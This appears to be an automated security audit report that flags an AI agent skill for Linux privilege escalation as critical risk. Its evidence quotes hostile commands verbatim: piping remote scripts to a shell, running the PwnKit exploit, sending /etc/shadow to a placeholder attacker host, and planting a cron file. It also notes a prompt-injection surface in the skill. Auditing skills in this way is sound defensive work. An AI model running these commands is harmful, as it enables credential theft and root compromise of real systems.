Skills
skills/yaklang/hack-skills/linux-privilege-escalation/Gen Agent Trust Hub

linux-privilege-escalation

Fail

Audited by Gen Agent Trust Hub on Apr 9, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill facilitates the execution of remote code by downloading scripts from unverified sources and piping them directly to a shell.\n
  • Evidence: The command curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh is recommended for comprehensive enumeration in SKILL.md.\n
  • Evidence: Direct execution of the PwnKit exploit via curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit && chmod +x PwnKit && ./PwnKit in KERNEL_EXPLOITS_CHECKLIST.md.\n- [DATA_EXFILTRATION]: The skill includes explicit techniques for sending sensitive system information to external attacker-controlled endpoints.\n
  • Evidence: wget --post-file=/etc/shadow http://ATTACKER/ is listed as a method to exfiltrate the shadow file in SUID_CAPABILITIES_TRICKS.md.\n
  • Evidence: curl -o /etc/cron.d/rev http://ATTACKER/cron provides a way to write malicious files from a remote server in SUID_CAPABILITIES_TRICKS.md.\n- [CREDENTIALS_UNSAFE]: The playbook provides instructions for harvesting a wide range of sensitive credentials and private keys from the target system.\n
  • Evidence: Instructions for reading /etc/shadow, ~/.bash_history, and SSH private keys like id_rsa in SKILL.md.\n
  • Evidence: Use of grep and find to locate password strings in configuration files across the filesystem in SKILL.md.\n- [COMMAND_EXECUTION]: The skill utilizes dangerous shell commands to escalate privileges and manipulate system security settings.\n
  • Evidence: Commands like chmod +s /tmp/bash and adding a root-level user to /etc/passwd are featured as primary escalation paths in SKILL.md.\n
  • Evidence: Exploiting specific Linux capabilities such as cap_setuid and cap_dac_override using interpreters like Python and Perl to obtain a root shell in SUID_CAPABILITIES_TRICKS.md.\n- [EXTERNAL_DOWNLOADS]: The skill relies on downloading numerous third-party security tools and exploit payloads from unverified repositories.\n
  • Evidence: Downloads for linux-exploit-suggester, pspy64, and LinEnum.sh from various GitHub accounts are encouraged in SKILL.md and KERNEL_EXPLOITS_CHECKLIST.md.\n- [PROMPT_INJECTION]: The skill has a significant indirect prompt injection surface by ingesting untrusted target system output to drive its logic without boundary markers or sanitization.\n
  • Ingestion points: Reads output from commands like uname, id, find, and getcap in SKILL.md.\n
  • Boundary markers: Absent.\n
  • Capability inventory: Includes os.system, subprocess, curl, wget, chmod, gcc, and mount across all scripts.\n
  • Sanitization: Absent.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 9, 2026, 01:14 PM